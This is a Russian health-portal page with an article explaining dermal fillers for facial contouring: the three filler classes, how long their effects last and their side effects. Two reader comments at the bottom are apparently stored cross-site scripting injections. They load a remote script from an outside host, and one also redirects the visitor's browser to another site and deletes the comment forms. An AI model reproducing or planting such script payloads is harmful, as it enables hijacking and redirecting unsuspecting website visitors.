Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сделать себя красивой...  >>  Как сделать себя красивой? Филлеры
 
Обратная связь
 

Как сделать себя красивой? Филлеры

Размер шрифта
04 марта 2014 00:00
  • google_analytics: false
  • Нравится

Мы продолжаем рассказ о достижениях эстетической медицины, и на очереди у нас феноменальный метод, от возможностей которого захватывает дух. Речь идет о контурной пластике.

Как сделать себя красивой? Филлеры

Ранее мы вскользь затрагивали эту методику на примере применения гиалуроновой кислоты, однако это была лишь одна грань алмаза.

Что же это такое – контурная пластика? Если говорить коротко, то это коррекция рельефа кожи с помощью инъекционного введения особого вещества – филлера. Это слово с английского переводится буквально как «наполнитель», и название весьма точно отражает суть: это некая гелеобразная масса, которой заполняются все неровности, морщины, углубления, провалы, рубцы и прочие визуальные дефекты кожи, имя которым – легион. И нередко эти дефекты являются отнюдь не плодом воображения капризных женщин (как поверхностно считают некоторые ханжи), а следствием заболевания кожи. Например, известно, что после акне (прыщи) часто остаются ужасные рубчики, которые грубо нарушают гармоничность поверхности кожи.

Сегодня врачи справляются с такими проблемами с изящной легкостью. Скальпели – в сторону; современная медицина движется в сторону малоинвазивных технологий, а эстетическая медицина в этом отношении находится в самом что ни на есть авангарде. Коррекция формы и объема губ, подъем уголков рта и бровей, формирование объема скул и подбородка, ликвидация провалов в подглазничной области, устранение деформаций носа и даже пластика гениталий – это и многое другое сегодня блистательно выполняется с помощью филлеров, без единого надреза.

Мы не зря употребляем это непривычное слово во множественном числе, ибо филлеров существует несметное количество. В целом их можно классифицировать на три большие группы:

  • Перманентные или постоянные. К ним относятся синтетические гели: жидкий силикон, формакрил, аквамид и многие другие. Вопреки многообещающему названию, которое сулит результат навеки веков, перманентные филлеры являются наименее предпочтительным вариантом. Все потому, что их применение ассоциировано с большим количеством крайне неприятных побочных эффектов, таких как: миграция введенного препарата, изъязвление, развитие гранулематозного воспаления, отторжение и так далее. Такие филлеры сегодня используют крайне редко и только в тех случаях, когда это оправданно с точки зрения медицины (например, при наличии выраженных посттравматических дефектов).
  • Длительно действующие филлеры. Эти гели представляют собой комбинацию природных и искусственных материалов. Корригирующий эффект сохраняется в течение полутора-двух лет. Увы и ах, все побочные эффекты, свойственные перманентным филлерам, наличествуют и тут, и коррекция их аналогичным образом возможна только хирургическим путем. Поэтому эта группа филлеров также имеет по большей части историческое значение.
  • Временные или биодеградирующие филлеры. А вот и наш победитель! Эти препараты имеют на 100% естественное происхождение, они эффективны и весьма безопасны, что и сделало их самой популярной группой средств в контурной пластике. Временные филлеры создаются на основе либо коллагена, либо гиалуроновой кислоты (как животного, так и неживотного происхождения). Длительность коррегирующего эффекта варьирует в зависимости от многих показателей (например, молекулярной массы, концентрации препарата и его вязкости), колеблясь в промежутке примерно от полугода до года. Впрочем, стоит отметить, что после повторных сеансов этот временной промежуток чаще всего возрастает вследствие суммации эффектов нового и ранее введенного филлеров. Побочные эффекты при применении биодеградирующих филлеров редки, но все же они случаются (ведь это лекарственный препарат, а не шарлатанский вздор). К ним относятся синяки, телеангиоээктазии (расширенные поверхностные кровеносные сосуды), нагноение, аллергические реакции и ряд других.

Вполне закономерно, что современная контурная пластика живет и дышит поиском своего «философского камня» – идеального филлера, который действовал бы максимально долго и вызывал бы минимальное количество побочных эффектов. Скажем, крайне многообещающим в этом свете выглядит филлер на основе принципиально другого вещества – гидроксиапатита кальция.

Впрочем, уже имеющихся средств в арсенале контурной пластики вполне достаточно, чтобы творить настоящие чудеса с внешним обликом.

Читайте о других выдающихся достижениях эстетической медицины на страницах нашего специального проекта «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
День диагностики меланомы   Как правильно спать?   Угревая болезнь: причины и возможности лечения   Еда может заставить вас светится от красоты! Что есть?!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что, кроме птичьего помета, входит в ваши кремы?
Как секс делает вас красивее
Как сделать себя красивой? Красота без разрезов

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.